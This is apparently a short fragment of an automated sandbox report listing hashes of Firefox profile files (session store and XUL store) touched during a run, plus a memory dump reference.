SHA512 b8f7c4150326f617b63d6bc72953160804a3749f6dec0492779f6c72b3b09c8d1bd58f47d499205c9a0e716f55fe5f1503d7676a4c85d31d1c1e456898af77b4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore.jsonlz4

MD5 1e2149ea222cdc56144474af79570591
SHA1 f43a3a4808b6d7ccde67905d5ffe43705fcfc14a
SHA256 4be52032d63213664295d688e29085951e2cf5de567228f33182c96dff2d490a
SHA512 d9c6838eaa9818ee51496669dfd3c06b0cfc838cea918ca38e03a38d07d4d9317f0e2ca5f943ca97c6fae291a4a2ed29cda72bd4308550e19717f0c73c315b2e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\xulstore.json.tmp

MD5 b847f28acdec63348ea376efd4278d02
SHA1 da4ae0ce914885ad7fe1f89aef3aa4f324747091
SHA256 7e63f727108182d4afdf0ae5131c9e0692d857b934fe8d93a7d4a8cea58fb834
SHA512 07b89826d35c5b9f056c8556ed5dd0a961f779d1aa7639321b90c56ef65bf6706a653a22f7790543b1482414069d5587c1f1c28215e92a7ffdf0fa4a55537c08

memory/32-2230-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp